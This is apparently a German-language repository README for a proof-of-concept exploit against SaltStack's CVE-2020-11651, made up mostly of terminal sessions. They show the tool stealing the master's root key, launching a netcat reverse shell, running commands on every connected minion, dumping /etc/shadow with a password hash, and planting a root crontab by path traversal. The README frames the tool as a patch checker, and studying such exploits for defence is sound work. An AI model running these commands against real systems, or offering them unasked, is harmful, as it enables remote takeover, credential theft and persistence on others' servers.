
Repository, das einen CVE-2020-11651-Exploit enthält, der für die neuesten Versionen von Python aktualisiert wurde.
Repository, das einen CVE-2020-11651-Exploit enthält, der für die neuesten Python-Versionen aktualisiert wurde und Fehler bei Verbindungen behandelt.
Dies ist ein Proof-of-Concept-Exploit basierend auf dem ersten Check-Skript. Verwenden Sie es, um zu überprüfen, ob Sie Ihre Salt-Master-Server erfolgreich auf eine Version mit den erforderlichen Fixes aktualisiert haben.
Dank an F-Secure Labs für ihre Forschung und Berichterstattung.
Derzeit kann dieses Skript für den Dateisystemzugriff und die Planung von Befehlen auf dem Master und allen verbundenen Minions verwendet werden. Nutzen Sie diese Kräfte weise!
Der Standardbetrieb (ohne Argumente) besteht darin, den Root-Key für den angegebenen Master zu erhalten:
root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130
[!] Bitte verwenden Sie dieses Skript nur, um zu überprüfen, ob Sie Systeme korrekt gepatcht haben, auf die Sie Zugriff haben. Drücken Sie ^C zum Abbrechen.
[+] Salt-Version: 3000.1
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
root@kalimah:~/salt#
Ausführen beliebiger Befehle auf dem Master:
root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130 --exec "nc 127.0.0.1 4444 -e /bin/sh"
[!] Bitte verwenden Sie dieses Skript nur, um zu überprüfen, ob Sie Systeme korrekt gepatcht haben, auf die Sie Zugriff haben. Drücken Sie ^C zum Abbrechen.
[+] Salt-Version: 3000.1
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
[+] Versuche, nc 127.0.0.1 4444 -e /bin/sh auf 192.168.115.130 auszuführen.
[+] Job erfolgreich geplant: 20200504153851746472
root@kalimah:~/salt#
Dasselbe, aber auf allen Minions:
root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130 --exec-all="apt-get upgrade -y"
[!] Bitte verwenden Sie dieses Skript nur, um zu überprüfen, ob Sie Systeme korrekt gepatcht haben, auf die Sie Zugriff haben. Drücken Sie ^C zum Abbrechen.
[+] Salt-Version: 3000.1
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
[!] Lester, ist das was du willst? Drücken Sie ^C zum Abbrechen.
[+] Versuche, 'apt-get upgrade -y' auf allen mit 192.168.115.130 verbundenen Minions auszuführen.
[+] Job erfolgreich an alle Minions übermittelt.
root@kalimah:~/salt#
Dateien können gelesen werden mit:
root@kalimah:~/salt# python2 exploit.py --master 192.168.115.130 -r /etc/shadow
[+] Salt-Version: 2019.2.0
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: GkJiProN36+iZ53buhvhm3dWcC/7BZyEomu3lSFucQF9TkrCRfA32EIFAk/yyQMkCyqZyxjjp/E=
[+] Versuche, /etc/shadow von 192.168.115.130 zu lesen.
root:$6$7qfolaa/$3yhszWj/VUJjfPaqr1yO6NLgV/FhHnVT9Pr6spwJ/F0BJw5vFM.3KjtwcnnuGo5uSJJkLrd28jXrmVZUD9nEI/:17812:0:99999:7:::
daemon:*:17785:0:99999:7:::
bin:*:17785:0:99999:7:::
sys:*:17785:0:99999:7:::
sync:*:17785:0:99999:7:::
games:*:17785:0:99999:7:::
man:*:17785:0:99999:7:::
Dateien können mit --upload-src und --upload-dest hochgeladen werden. Beachten Sie, dass das Ziel ein relativer Pfad sein muss:
root@kalimah:~/salt# python2 exploit.py --upload-src evil.crontab --upload-dest ../../../../../../var/spool/cron/crontabs/root
[+] Salt-Version: 2019.2.0
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (127.0.0.1:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: GkJiProN36+iZ53buhvhm3dWcC/7BZyEomu3lSFucQF9TkrCRfA32EIFAk/yyQMkCyqZyxjjp/E=
[-] Der Zielpfad muss relativ sein.
[+] Versuche, evil.crontab nach ../../../../../../var/spool/cron/crontabs/root auf 127.0.0.1 hochzuladen.
[ ] Daten in Datei /srv/salt/../../../../../../var/spool/cron/crontabs/root geschrieben.
Python 2 oder 3
Salt (pip3 install salt)